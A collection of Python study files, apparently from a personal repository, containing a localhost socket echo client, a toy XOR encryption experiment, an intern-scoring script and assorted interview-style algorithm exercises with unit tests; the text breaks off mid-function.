'nice to meet you_{x}'.format(x=_id)]
def __sender_bot():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
for msg in msgs:
sz = s.send(msg.encode())
print('<- {} : {}'.format(id(s), msg))
print('-> {} : {}'.format(id(s), s.recv(sz).decode()))
sleep(1)
s.close()
bot_thread = t.Thread(target=__sender_bot)
bot_thread.start()
bots = 10
for i in range(1, bots+1):
sender_bot(i)
```
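The client above assumes an echo service listening on localhost:50000; a minimal threaded counterpart might look like the following sketch (not part of the original file, host/port mirror the client's constants):

```python
import socket
import threading

def handle(conn):
    with conn:
        while True:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(data)          # echo the bytes back unchanged

def serve(host='localhost', port=50000):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        while True:
            conn, _addr = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

if __name__ == '__main__':
    serve()
```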
#### File: udacity/st101/my_avg.py
```python
import unittest
def mean(A):
return sum(A)/len(A)
def median(A):
lenA = len(A)
half = int(lenA/2)
if lenA%2==0:
return sum(A[half-1:half+1])/2
else:
return A[half]
def mode(A):
import collections
c = collections.Counter(A)
return c.most_common()[0][0]
def mmm(A):
A.sort()
return mean(A), median(A), mode(A)
class MyAvgTest(unittest.TestCase):
def test_method1(self):
A = [5, 9, 100, 9, 97, 6, 9, 98, 9]
self.assertEqual(mmm(A), (38.0, 9, 9))
if __name__=="__main__":
unittest.main()
```
#### File: notes/my_own_encryption_experiment/divider.py
```python
from random import randint
def randhex():
i = randint(0,255)
return bytes([i])
def divider1(fname):
divisor = 2
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
fp3 = open(fname+'.out2', 'wb')
i = 0
c = fp1.read(1)
while c:
if(i%divisor==0):
fp2.write(c)
else:
fp2.write(randhex())
c = fp1.read(1)
i+=1
fp2.close()
i = 0
fp1.seek(0)
c = fp1.read(1)
while c:
if(i%divisor==1):
fp3.write(c)
else:
fp3.write(randhex())
c = fp1.read(1)
i+=1
fp3.close()
fp1.close()
def swapper1(fname):
pivot = 0b10101010
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
fp3 = open(fname+'.out2', 'wb')
c = fp1.read(1)
while c:
ec = encrypt(c, pivot)
fp2.write(ec)
dec = encrypt(ec, pivot)
fp3.write(dec)
c = fp1.read(1)
fp3.close()
fp2.close()
fp1.close()
def encrypt(_bytes, pivot):
'''XOR a single byte with the pivot'''
assert len(_bytes)==1
return bytes([_bytes[0] ^ pivot])
def encrypt_file(fname, passphrase):
UNIT=8 # 8bits per byte
bitkey = ''.join([bin(ord(c)).lstrip('0b').zfill(UNIT) for c in passphrase])
keysize, remainder = divmod(len(bitkey),UNIT)
#import pdb; pdb.set_trace()
assert remainder == 0
#assert is_multiple_of_two(keysize)
pivot = int(bitkey, 2)
key_in_bytes = convert_to_bytes(pivot, UNIT)
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
bits = fp1.read(keysize)
while bits:
ec = encrypt_mbitwise(bits, key_in_bytes)
fp2.write(ec)
bits = fp1.read(keysize)  # read key-sized chunks so every byte gets paired with a key byte
fp2.close()
fp1.close()
def convert_to_bytes(integer, bytes_size):
'''returns bytes that is converted from given integer'''
result = bytearray()
src = bin(integer).lstrip('0b').zfill(bytes_size*8)
for i in range(0, len(src), 8):
_int = int(src[i:i+8],2)
result.append(_int)
return bytes(result)
def encrypt_mbitwise(bytes, key_in_bytes):
'''returns encrypted bytes in type of bytearray'''
return bytearray([a^b for a,b in zip(bytes, key_in_bytes)])
def is_multiple_of_two(n):
'''returns true if n is multiple of two, else false'''
return 0 <= bin(n).count('1') <= 1
if __name__=="__main__":
import sys
fname = sys.argv[1]
encrypt_file(fname, '루이보스보리차!@#')
#encrypt_file(fname, 'password')
#encrypt_file(fname, '<PASSWORD>')
```
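swapper1 above relies on XOR being its own inverse: applying the same pivot twice restores the original byte. A tiny self-contained check of that property (illustrative only):

```python
pivot = 0b10101010
original = b'secret'

encrypted = bytes(b ^ pivot for b in original)
restored  = bytes(b ^ pivot for b in encrypted)

assert restored == original
print(encrypted)   # scrambled bytes
print(restored)    # b'secret'
```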
#### File: notes/my_own_encryption_experiment/test_divider.py
```python
import unittest
from divider import encrypt_file, encrypt_mbitwise, is_multiple_of_two, convert_to_bytes
class EncrypterTest(unittest.TestCase):
def test_encrypt_mbitwise1(self):
bytes = b'hello world'
key_in_bytes = b'password'
encrypted_bytes = encrypt_mbitwise(bytes, key_in_bytes)
print(encrypted_bytes)
#self.assertEqual(encrypted_bytes, b'')
def test_is_multiple_of_two1(self):
self.assertTrue(is_multiple_of_two(0b1))
def test_is_multiple_of_two2(self):
self.assertTrue(is_multiple_of_two(0b1000))
def test_is_multiple_of_two3(self):
self.assertTrue(is_multiple_of_two(0b00010000))
def test_is_multiple_of_two4(self):
self.assertTrue(is_multiple_of_two(0b0))
def test_is_multiple_of_two5(self):
self.assertFalse(is_multiple_of_two(0b00010001))
def test_convert_to_bytes1(self):
integer = 3
bytes_size = 1
self.assertEqual(convert_to_bytes(integer, bytes_size), b'\x03')
def test_convert_to_bytes2(self):
integer = 256
bytes_size = 2
self.assertEqual(convert_to_bytes(integer, bytes_size), b'\x01\x00')
def test_convert_to_bytes3(self):
integer = 511
bytes_size = 2
self.assertEqual(convert_to_bytes(integer, bytes_size), b'\x01\xff')
'''
Because the data is always split at fixed byte boundaries, patterns can show up in a hexdump of the output.
Also, when a passphrase made of typeable characters lines up with runs of zero bytes in the binary, the ciphertext degenerates and exposes the plaintext.
So the passphrase should be salted and hashed, and the stream should be handled at the bit level rather than in byte units.
'''
# def test_encrypt_file(self):
# filename = './hello.txt'
# encrypt_file(fname, 'password')
if __name__=='__main__':
unittest.main()
```
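Following the note above, a hedged sketch of how the passphrase could be salted and stretched into key material before XOR-ing, using only the standard library (the iteration count and key length here are illustrative, not a vetted KDF configuration):

```python
import hashlib
import os

def derive_key(passphrase, salt, length=32):
    """Stretch the passphrase into `length` bytes of pseudo-random key material."""
    return hashlib.pbkdf2_hmac('sha256', passphrase.encode('utf-8'),
                               salt, 100000, dklen=length)

salt = os.urandom(16)
key = derive_key('루이보스보리차!@#', salt)
print(len(key), key.hex())   # 32 key bytes with no visible passphrase pattern
```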
#### File: notes/ranking_interns/intern.py
```python
cands = { '파이리': {'code-grade':950, 'code-style':5, 'system-design':3,'potential':5, 'attitude':5, 'portfolio':1},
'청아': {'code-grade':800, 'code-style':4.5, 'system-design':3,'potential':4, 'attitude':5, 'portfolio':3},
'혹찬기': {'code-grade':650, 'code-style':3, 'system-design':4,'potential':5, 'attitude':5, 'portfolio':1},
'킴숙주': {'code-grade':650, 'code-style':2, 'system-design':4,'potential':3, 'attitude':5, 'portfolio':1},
'이산': {'code-grade':650, 'code-style':2.5, 'system-design':2,'potential':5, 'attitude':5, 'portfolio':1},
'강산애': {'code-grade':600, 'code-style':2, 'system-design':1,'potential':2, 'attitude':5, 'portfolio':3},
'준마에': {'code-grade':550, 'code-style':2, 'system-design':3,'potential':5, 'attitude':5, 'portfolio':3},
'이상준': {'code-grade':450, 'code-style':2, 'system-design':2,'potential':5, 'attitude':5, 'portfolio':4},
'김국주': {'code-grade':450, 'code-style':3, 'system-design':3.5,'potential':5, 'attitude':5, 'portfolio':5},
'황산벌': {'code-grade':450, 'code-style':3, 'system-design':3,'potential':5, 'attitude':5, 'portfolio':3.5} }
weights = { 'code-grade': 0.25,
'code-style': 0.10,
'potential': 0.30,
'attitude': 0.20,
'portfolio': 0.15 }
def main():
top4 = sort_candidates(cands, weights)[:4]
residue = sort_candidates(cands, weights)[4:]
print(top4)
print()
print(residue)
def sort_candidates(cands, weights):
''' @return [(name, score)] '''
name_score_lst = [(name, round(calc_score(grades, weights), 2)) for (name, grades) in cands.items()]
name_score_lst.sort(key=lambda p:p[1], reverse=True)
return name_score_lst
def calc_score(grades, weights):
''' @return (name, score) '''
score = 0
for attr, w in weights.items():
if attr == 'code-grade':
score += grades[attr] * 5 * w / 950
else:
score += grades[attr] * w
return score
main()
```
#### File: 00.organize.me/algorithm_competition_by_goojongman/ites.py
```python
import unittest
def seed(i):
assert i>=0
if i==0:
return 1983
return (seed(i-1)*214013 + 2531011) % (1<<32)
def A(i):
return seed(i) % 10000 + 1
def AA():
seed = 1983
while True:
ret = seed % (1<<32)
seed = (seed * 214013 + 2531011) % (1<<32)
yield ret % 10000 + 1
def ites(start, stop, K):
assert K > 0
assert start <= stop
a = A(start)
#basis
if start == stop:
return 1 if a==K else 0
#recursive
res = ites(start+1, stop, K)
if a < K:
res += ites(start+1, stop, K-a)
elif a == K:
res += 1
return res
class ITESTest(unittest.TestCase):
def ITESResult(self, K, N, count):
self.assertEqual(ites(0, N-1, K), count)
def test_A(self):
al = [A(i) for i in range(5)]
self.assertEqual(al, [1984, 8791, 4770, 7665, 3188])
def test_AA(self):
iter_aa = AA()
aal = [next(iter_aa) for i in range(5)]
self.assertEqual(aal, [1984, 8791, 4770, 7665, 3188])
def test_samples(self):
self.ITESResult(K=8791, N=20, count=1)
self.ITESResult(K=5265, N=5000, count=4)
#self.ITESResult(K=3578452, N=5000000, count=1049)
if __name__ == "__main__":
unittest.main()
```
#### File: 00.organize.me/algorithm_competition_by_goojongman/quadtree.py
```python
import unittest
class QuadTree:
def __init__(self, bwx, one=None, two=None, three=None, four=None):
self.bwx = bwx
self.one = one
self.two = two
self.three = three
self.four = four
@classmethod
def make_tree(cls, msg):
qtree, _ = cls._make_tree(msg)
return qtree
@classmethod
def _make_tree(cls, msg):
assert len(msg) > 0
head, tail0 = msg[0], msg[1:]
#basis
if head != 'x':
return (QuadTree(head), tail0)
else:
one, tail1 = cls._make_tree(tail0)
two, tail2 = cls._make_tree(tail1)
three, tail3 = cls._make_tree(tail2)
four, tail4 = cls._make_tree(tail3)
return (QuadTree('x', one, two, three, four), tail4)
def __str__(self):
return self.bwx + (str(self.one) if self.one else '') \
+ (str(self.two) if self.two else '') \
+ (str(self.three) if self.three else '') \
+ (str(self.four) if self.four else '')
def flip(qtree):
''' change in-place '''
if qtree and qtree.bwx == 'x':
flip(qtree.one)
flip(qtree.two)
flip(qtree.three)
flip(qtree.four)
qtree.three, qtree.four, qtree.one, qtree.two = qtree.one, qtree.two ,qtree.three, qtree.four
class QuadTreeStrTest(unittest.TestCase):
def test_quadtree1(self):
qtree = QuadTree.make_tree("w")
self.assertEqual(str(qtree), 'w')
def test_quadtree2(self):
qtree = QuadTree.make_tree("xwwbb")
self.assertEqual(str(qtree), 'xwwbb')
class QuadtreeFlipTest(unittest.TestCase):
def assertFlipped(self, inp, out, msg=None):
qtree = QuadTree.make_tree(inp)
flip(qtree)
self.assertEqual(str(qtree), out, msg)
def test_flip1(self):
self.assertFlipped("w", "w", "mono color should be identical")
def test_flip2(self):
self.assertFlipped("xbwwb", "xwbbw")
def test_flip3(self):
self.assertFlipped("xbwxwbbwb", "xxbwwbbbw")
def test_flip4(self):
self.assertFlipped("xxwwwbxwxwbbbwwxxxwwbbbwwwwbb", "xxwbxwwxbbwwbwbxwbwwxwwwxbbwb")
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/algorithm_competition_by_goojongman/sortgame.py
```python
import unittest
from math import inf
from itertools import combinations as comb
def get_next(seq, discovered):
seq_len = len(seq)
for c in comb(range(seq_len), 2):
a,b = c
next_node = seq[0:a] + list(reversed(seq[a:b+1])) + seq[b+1:seq_len]
if next_node not in discovered:
yield next_node
def sortgame(not_sorted):
''' return minimum cnt to sort `not_sorted` '''
cnt = 0
discovered = [not_sorted]
q = [(0, not_sorted)]
sorted_seq = sorted(not_sorted)
while q:
cnt, seq = q.pop(0)
if sorted_seq == seq:
return cnt
for next_node in get_next(seq, discovered):
discovered.append(next_node)
q.append((cnt+1, next_node))
assert False, "cannot reach here"
class ModuleTest(unittest.TestCase):
def test_get_next(self):
it = get_next([2,1,3,4], [])
next_node = next(it)
self.assertEqual(next_node, [1,2,3,4])
class SortGameTest(unittest.TestCase):
def test_samples(self):
self.assertSorted([1,2,3,4,8,7,6,5], 1)
self.assertSorted([3,999,1,2], 2)
self.assertSorted([1000, 2000, 3000], 0)
def assertSorted(self, not_sorted, cnt):
self.assertEqual(sortgame(not_sorted), cnt)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/17-14.py
```python
WORD_LIST = []
with open('english_dictionary.txt', 'r', encoding="ISO-8859-1") as fp:
WORD_LIST = fp.read().splitlines()
WORD_LIST = [word.lower() for word in WORD_LIST]
WORD_LIST = list(set(WORD_LIST))
_WORD_LIST = []
for word in WORD_LIST:
# keep only words made entirely of lowercase ascii letters
if all(ch in 'abcdefghijklmnopqrstuvwxyz' for ch in word):
_WORD_LIST.append(word)
WORD_LIST = _WORD_LIST
WORD_LIST.sort(key = lambda x: (len(x), x))
print('done sorting word_list')
print('words length ranges from {} to {}'.format(len(WORD_LIST[0]), len(WORD_LIST[-1])))
print('Creating rainbow_table')
rainbow_table = {}
for word in WORD_LIST:
for i in range(len(word)):
key = word[:i+1]
if key not in rainbow_table:
rainbow_table[key] = True
print('Done!')
def restore_naive(sentence):
words = []
i,j = 0,1
while i<len(sentence):
i,j = find_word_in_sentence(sentence,i,j,words)
words = concat_capitals_together(words)
new_sentence = ' '.join(words)
return new_sentence
def find_word_in_sentence(sentence, i, j, words):
assert i < len(sentence)
while j<=len(sentence) and sentence[i:j] in rainbow_table:
j+=1
word = sentence[i:j-1]
if word in WORD_LIST:
words.append(word)
else:
words.append(word.upper())
i = j - 1
#j = j
return i, j
def concat_capitals_together(words):
on_capital = False
range_list = []
for i, word in enumerate(words):
if word.isupper() and not on_capital:
on_capital = True
start_idx = i
elif word.isupper() and on_capital:
if i==(len(words)-1):
range_list.append((start_idx, len(words)))
elif not word.isupper() and on_capital:
on_capital=False
end_idx = i
range_list.append((start_idx, end_idx))
elif not word.isupper() and not on_capital:
pass
else:
assert False
#range_list is prepared
for i,j in range_list[::-1]:
words[i:j] = [''.join(words[i:j])]
return words
#broken_sentence = 'ilovejinsungheleftthismorning'
broken_sentence = 'jesslookedjustliketimherbrother'
print(restore_naive(broken_sentence))
```
#### File: 00.organize.me/Cracking the Coding Interview/18-10.py
```python
import unittest
WORDS = ['FISH', 'HACK', 'DAMP', 'LAMP', 'LIMP', 'LIME', 'LIKE', 'HELL',
'DICK', 'DICT', 'KNOW', 'BOWL', 'ROSE', 'ROLL', 'KILL', 'LOVE']
DIC = {word:True for word in WORDS}
def wordjump(dic, start, stop):
def get_neighbors(v):
for i in range(len(v)):
for alpha in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
new_word = v[:i] + alpha + v[i+1:]
if new_word in dic:
yield new_word
if start not in dic:
return None
parent = {start : None}
to_visit = [start] # to visit
discovered = {start} # discovered == to_visit + visited
found = False
while to_visit:
v = to_visit.pop(0) #now, v is visited
if v == stop:
found = True
break
for neigh_v in get_neighbors(v):
if neigh_v not in discovered:
parent[neigh_v] = v
to_visit.append(neigh_v)
discovered.add(neigh_v)
if not found:
return None
path = []
while v:
path.append(v)
v = parent[v]
return list(reversed(path))
class WordjumpTest(unittest.TestCase):
def test_samples(self):
i = ['DAMP', 'LIKE']
o = ['DAMP', 'LAMP', 'LIMP', 'LIME', 'LIKE']
self.assertWordjump(i, o)
def test_sample2s(self):
self.assertWordjump(['LIME', 'XXXX'], None)
self.assertWordjump(['XXXX', 'YYYY'], None)
def assertWordjump(self, i, o):
self.assertEqual(wordjump(DIC, *i), o)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/18-3.py
```python
import unittest
from random import randint
def shuffled_index(cnt):
''' iterator '''
res = list(range(cnt))
for i in range(cnt):
#invariant #res[0:i] is selected
nextint = randint(i, cnt-1)
res[nextint], res[i] = res[i], res[nextint]
yield res[i]
#invariant #res[0:i+1] is selected
def select_random(m, n):
assert 0<=n<=m
it = shuffled_index(m)
return [next(it) for _ in range(n)]
class SelectRandomTest(unittest.TestCase):
def test_assertionError(self):
with self.assertRaises(AssertionError):
self.assertRandomlySelected(10, -1)
with self.assertRaises(AssertionError):
self.assertRandomlySelected(10, 111)
def test_samples(self):
self.assertRandomlySelected(10, 0)
self.assertRandomlySelected(10, 5)
self.assertRandomlySelected(10, 8)
self.assertRandomlySelected(10, 10)
def assertRandomlySelected(self, m, n):
res = select_random(m, n)
self.assertEqual(len(res), n)
for i in res:
self.assertTrue( 0<= i < m)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/18-5.py
```python
import unittest
from math import inf
def shortest_distance(A, B):
''' my way - efficient '''
assert A
assert B
mini = inf
len_a, len_b = len(A), len(B)
idx_a, idx_b = 0, 0
while idx_a < len_a and idx_b < len_b:
val_a, val_b = A[idx_a], B[idx_b]
mini = min(abs(val_a - val_b), mini)
if val_a < val_b:
idx_a += 1
else:
idx_b += 1
return mini
def shortest_distance_merged(A, B):
''' as Gayle Laakmann McDowell suggested '''
def merge(it_X, it_Y):
''' assume it_X and it_Y are in ascending order'''
#it_x, it_y = it_X, it_Y
#C = []
#x = next(it_x, None)
#y = next(it_y, None)
#while x and y:
# if x < y:
# C.append(x)
# x = next(it_x, None)
# else:
# C.append(y)
# y = next(it_y, None)
#if x:
# C.append(x)
# C.extend(it_x)
#if y:
# C.append(y)
# C.extend(it_y)
#return C
C = list(it_X) + list(it_Y)
C.sort()
return C
#code starts here
assert A
assert B
mini = inf
C = merge( ((a, 'a') for a in A), ((b, 'b') for b in B) )
for i,j in zip(C, C[1:]):
i_val, i_label = i
j_val, j_label = j
if i_label==j_label:
continue
mini = min(abs(i_val-j_val), mini)
return mini
class WordsDistanceTest(unittest.TestCase):
def test_samples(self):
self.assertShortestDistance([0], [10], 10)
self.assertShortestDistance([0], [8, 14], 8)
self.assertShortestDistance([0,5], [3, 6], 1)
self.assertShortestDistance([0, 10, 11, 15], [8, 14], 1)
def assertShortestDistance(self, A, B, expected):
self.assertEqual(shortest_distance(A, B), expected)
self.assertEqual(shortest_distance_merged(A, B), expected)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/2-2.py
```python
class Node(object):
def __init__(self, val):
self.val = val
self.next = None
# def __iter__(self):
# while self:
# yield self
# self = self.next
def iterating_nodes(node):
while node:
yield node
node = node.next
class Tracker(object):
def __init__(self, k):
self.k = k
self.li = []
def push(self, node):
self.li.append(node)
if len(self.li)>self.k:
del(self.li[0])
def track(node, k):
assert k>=0
tracker = Tracker(k)
#for nd in node:
while node:
tracker.push(node)
node = node.next
return tracker.li[0]
def main():
one = Node(1)
two = Node(2)
three = Node(3)
four = Node(4)
five = Node(5)
one.next = two
two.next = three
three.next = four
four.next = five
n_th_node_from_the_end = track(one, 3)
print(n_th_node_from_the_end.val)
if __name__=="__main__":
main()
```
#### File: 00.organize.me/Cracking the Coding Interview/9-5.py
```python
def permutation(li):
assert isinstance(li, list)
if len(li)==1:
return li
elif len(li)==2:
return [[li[0],li[1]], [li[1],li[0]]]
for i in range(len(li)):
new_li = circular(i, li)
f, r = new_li[0], new_li[1:]
for each in permutation(r):
each.insert(0,f)
print(each)
def circular(i, li):
assert i<=len(li)-1
result = []
for j in range(len(li)):
result.append( li[(i+j)%len(li)] )
return result
li = ['a','b','c']
permutation(li)
```
#### File: 00.organize.me/Cracking the Coding Interview/9-8.py
```python
def coin_procedural(n):
result=[]
for q in range(n//25+1):
left1=n-q*25
for d in range(left1//10+1):
left2=left1-d*10
for ni in range(left2//5+1):
pe=left2-ni*5
result.append([q,d,ni,pe])
return result
#print(coin_procedural(100))
def coin_recursive(n, coin_types, coin_index):
assert n>=0
assert 0<=coin_index<len(coin_types)
cur_coin = coin_types[coin_index]
if coin_index==len(coin_types)-1:
return [[n//cur_coin]]
tmp = []
for cnt in range(n//cur_coin+1):
for each in coin_recursive(n-cur_coin*cnt, coin_types, coin_index+1):
each.insert(0, cnt)
tmp.append(each)
return tmp
def coin_recursive_wrapper(n):
return coin_recursive(n, [25,10,5,1], 0)
print(coin_recursive_wrapper(100))
```
#### File: 00.organize.me/Cracking the Coding Interview/A_counter_8s.py
```python
def counter(n):
cnt = 0
for i in range(n):
cnt += howMany8s(i)
return cnt
def howMany8s(num):
if num < 0:
assert(False)
cnt = 0
while(0 < num):
if (num%10) == 8:
cnt+=1
num //= 10
return cnt
if __name__=="__main__":
print(counter(10000))
```
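Equivalently, each number can be rendered as a string and its '8' characters counted directly; a short cross-check of howMany8s (illustrative, meant to run alongside the file above):

```python
def how_many_8s_str(num):
    return str(num).count('8')

# agrees with the digit-by-digit version for non-negative integers
assert all(howMany8s(i) == how_many_8s_str(i) for i in range(1000))
print(sum(how_many_8s_str(i) for i in range(10000)))   # same total as counter(10000)
```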
#### File: 00.organize.me/Cracking the Coding Interview/A_heap.py
```python
import pdb
class MinHeap:
def __init__( self, size ):
self.size = size+1
self.cnt = 0
self.heap = []
for i in range(self.size):
self.heap.append([])
def getParentIdx ( self, idx ):
return idx//2
def getLeftChildIdx( self, idx ):
return 2*idx
def getRightChildIdx( self, idx ):
return 2*idx+1
def addInt( self, num ):
if self.cnt > self.size-2:
return False
self.cnt += 1
self.heap[self.cnt] = [num]
#process to keep in order
my_idx = self.cnt
while(my_idx > 1):
par_idx = self.getParentIdx(my_idx)
if self.heap[ par_idx ] > self.heap[ my_idx ]:
self.heap[ par_idx ], self.heap[ my_idx ] = self.heap[ my_idx ], self.heap[ par_idx ]
my_idx = par_idx
return True
def popHeap( self ):
if self.cnt<1:
return None
#save return value in the end
min_val = self.heap[1][:]
rpl_val = self.heap[self.cnt][:]
self.cnt -= 1
emt_idx = 1
while(True):
#if right child exists, both children exist:
if self.getRightChildIdx(emt_idx) <= self.cnt:
l_idx, r_idx = self.getLeftChildIdx(emt_idx), self.getRightChildIdx(emt_idx)
#get the least value and its index
if self.heap[l_idx] < self.heap[r_idx] :
the_idx = l_idx
the_val = self.heap[l_idx]
else:
the_idx = r_idx
the_val = self.heap[r_idx]
#check if heap is out of order:
if the_val < rpl_val:
self.heap[emt_idx] = the_val
emt_idx = the_idx
#if heap is in order:
else:
self.heap[emt_idx] = rpl_val
break
#if right child doesn't exist and left child exists:
elif self.getLeftChildIdx(emt_idx) <= self.cnt:
l_idx = self.getLeftChildIdx(emt_idx)
l_val = self.heap[l_idx]
if l_val < rpl_val:
self.heap[emt_idx] = l_val
emt_idx = l_idx
else:
self.heap[emt_idx] = rpl_val
break
#if no child:
else:
self.heap[emt_idx] = rpl_val
break
#return the temporarily saved least value in the heap
return min_val
def PrintHeap( self ):
print(self.heap[1:self.cnt+1])
###
###End of Class
###
def unitTest1():
minHeap = MinHeap(10)
for i in [3,4,2,5,6,7,1,8]:
minHeap.addInt(i)
minHeap.PrintHeap()
for i in range(5):
minHeap.popHeap()
minHeap.PrintHeap()
for i in [1,22,3,4,55,-5]:
minHeap.addInt(i)
minHeap.PrintHeap()
for i in range(7):
        print(minHeap.popHeap())
minHeap.PrintHeap()
def heapSort(arr):
minHeap = MinHeap(len(arr))
for i in arr:
minHeap.addInt(i)
result = []
while(True):
p = minHeap.popHeap()
if p == None:
break
result.append(p[0])
return result
if __name__=="__main__":
    arr = [3,4,2,5,6,7,1,8]
    print('arr ->', arr)
    arr_sorted = heapSort(arr)
    print('arr_sorted ->', arr_sorted)
```
#### File: 00.organize.me/Cracking the Coding Interview/maze.py
```python
import unittest
def parse(s):
return [list(l.strip()) for l in s.strip().splitlines()]
def find_exit_narrow(m, i, j):
''' return True if exit is found, False, otherwise
m will be modified during search
    i,j = current point
! : exit point
X : wall
- : aisle
@ : visited
'''
def next_point(m, i, j):
        #north, east, south, west order
for ni, nj in [(i-1,j), (i,j+1), (i+1,j), (i,j-1)]:
if 0 <= ni < len(m) and 0 <= nj < len(m[0]) \
and m[ni][nj] not in "@X":
yield ni, nj
if m[i][j]=='!':
return True
m[i][j] = '@'
for n in next_point(m, i, j):
if find_exit_narrow(m, *n):
return True
m[i][j] = '-'
return False
def find_exit_narrow_by_stack(m, i, j):
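    # iterative DFS with an explicit stack; `visited` keeps already-explored cells off the stack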
def get_neighbors(m, i, j):
for ni, nj in [(i-1,j), (i,j+1), (i+1,j), (i,j-1)]:
if 0 <= ni < len(m) and 0 <= nj < len(m[0]) \
and m[ni][nj] in "-!":
yield ni, nj
assert m[i][j] in '-!'
visited = set()
stack = [(i,j)]
found = False
while stack:
i,j = stack[-1]
if (i,j) not in visited:
visited.add((i,j))
if m[i][j] == '!':
found = True
break
neighbor_found = False
for neighbor_pos in get_neighbors(m, i, j):
if neighbor_pos not in visited:
stack.append(neighbor_pos)
neighbor_found = True
break
if neighbor_found:
continue
stack.pop(-1)
#maybe modify m along stack for road map
for i,j in stack:
if m[i][j] == '-':
m[i][j] = '@'
return found
def find_exit_wide(m, i, j):
''' return True if exit is found, False, otherwise
m will be modified during search
    i,j = current point
! : exit point
X : wall
- : aisle
@ : visited
'''
def next_point(m, i, j):
        #north, east, south, west order
for ni, nj in [(i-1,j), (i,j+1), (i+1,j), (i,j-1)]:
if 0 <= ni < len(m) and 0 <= nj < len(m[0]) \
and m[ni][nj] not in "@X":
yield ni, nj
if m[i][j]=='!':
return True
m[i][j] = '@'
for n in next_point(m, i, j):
if find_exit_wide(m, *n):
return True
#m[i][j] = '-'
return False
def pretty_print_maze(m):
for line in m:
print(''.join(line))
class MazeTest(unittest.TestCase):
def setUp(self):
self.solutions = [find_exit_narrow, find_exit_wide, find_exit_narrow_by_stack]
self.sample = '''
-XXXXXX-XXXXXXXXXXXXX
--------XXX---------X
XX-XX-XXXXX-XXXXXXX-X
X--XX-X-XX-------XX-X
X-XXX-X-XX-XX-XXXXX-X
X--XX-X----XX-XX-XX-X
XX-XX-XXXX-XX-XX-XX-X
XX-XX-XXXX-XX-XX-XX-X
XX-XXXXXXX-XX-XX-XX-X
XX---------XX-XX-XX-X
XXXX-XX-XXXXX-XX-XX-X
X-XX-XX-X-----XX-XX-X
X-XX----X-XXX-XX----X
X-XXXXXXXXXXX-XXXXXXX
X-------------------!
XXXXXXXXXXXXXXXXXXXXX'''
self.sample2 = '''
-XXXXXX-XXXXXXXXXXXXX
--------XXX---------X
--------------------X
--------------------X
--------------------X
--------------------X
--------------------X
-------------------XX
XX-XXXXXXX-XXX-X-XX-X
XX---------XXX-X-XX-X
XXXX-XX-XXXXXX-X-XX-X
X-XX-XX-X----X-X-XX-X
X-XX----X-XXXX-X----X
X-XXXXXXXXXXXX-XXXXXX
X-------------------!
XXXXXXXXXXXXXXXXXXXXX'''
self.sample3 = '''
-----
-----
-----
----!'''
self.sample4 = '''
-XXX
-XXX
-XXX
--X!'''
def test_parse(self):
m = parse(self.sample)
assert len(m) > 1
first_len = len(m[0])
self.assertTrue(all(first_len==len(l) for l in m[1:]))
def test_narrow_maze(self):
for solution in self.solutions:
m = parse(self.sample)
self.assertTrue(solution(m, 0, 0))
#pretty_print_maze(m)
def test_wide_maze(self):
for solution in [find_exit_wide, find_exit_narrow_by_stack]:
m = parse(self.sample2)
self.assertTrue(solution(m, 0, 0))
#pretty_print_maze(m)
def test_fail_cases(self):
m = parse(self.sample4)
self.assertFalse(find_exit_narrow(m, 0, 0))
self.assertFalse(find_exit_wide(m, 0, 0))
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/p00_combination_iter.py
```python
def combination_iter(arr, many):
if type(arr)!=list or many<0 or many>len(arr):
assert(False)
result = []
queue = []
for ele in arr:
queue.append([ele])
while(0<len(queue)):
cur_list = queue.pop(0)
if len(cur_list) < many:
for ele in arr:
if cur_list[-1] < ele:
tmp_list = cur_list[:]
tmp_list.append(ele)
queue.append(tmp_list)
elif len(cur_list) == many:
result.append( cur_list )
else:
assert(False)
return result
def combination_wrapper( arr, many ):
#if not monotonically increasing:
#exit
for i in range(len(arr))[:-1]:
if arr[i]>arr[i+1]:
assert(False)
#if monotonically increasing:
return combination_iter(arr,many)
if __name__=="__main__":
    arr = [1,2,3,4,5,6]
    print(combination_wrapper( arr, 1 ))
    print(combination_wrapper( arr, 2 ))
    print(combination_wrapper( arr, 3 ))
    print(combination_wrapper( arr, 4 ))
    print(combination_wrapper( arr, 5 ))
    print(combination_wrapper( arr, 6 ))
```
#### File: 00.organize.me/Cracking the Coding Interview/p00_getCombiForCents_queue.py
```python
def getCombiForCents_wrapper(possible_list, mini, maxi=None):
if not maxi:
maxi = (mini-1)+max(possible_list)
return getCombiForCents(possible_list, mini, maxi)
def getCombiForCents(possible_list, mini, maxi):
if not possible_list:
assert(False)
result = []
queue = []
init_list = []
for i in range(len(possible_list)):
init_list.append(0)
#init_list = [0,0,0,0]
for i, price in enumerate(possible_list):
if price <=maxi:
tmp_init_list = init_list[:]
tmp_init_list[i] +=1
queue.append(tmp_init_list)
#queue INVARIANT:
#In queue are EVERY POSSIBLE combinations less than maxi
while( 0<len(queue) ):
#dup_test(queue)
#print len(queue)
#print queue
cur_price_list = queue.pop(0)
cur_price_tot = list_product(possible_list, cur_price_list)
# if mini <= cur_price_tot <= maxi:
if mini <= cur_price_tot:
result.append(cur_price_list)
#pdb.set_trace()
#DO NOT CORRUPT cur_price_list for sibling operations
for i, add_price in enumerate(possible_list):
if (cur_price_tot+add_price) <= maxi:
new_price_list = cur_price_list[:]
new_price_list[i] += 1
#CHECK IF new_price_list is already in queue:
#WITHOUT MEMBERSHIP TEST, INFINITE LOOPING MIGHT HAPPEN.
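                #(a set of tuples kept alongside the queue would make this membership check O(1) instead of scanning the whole queue)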
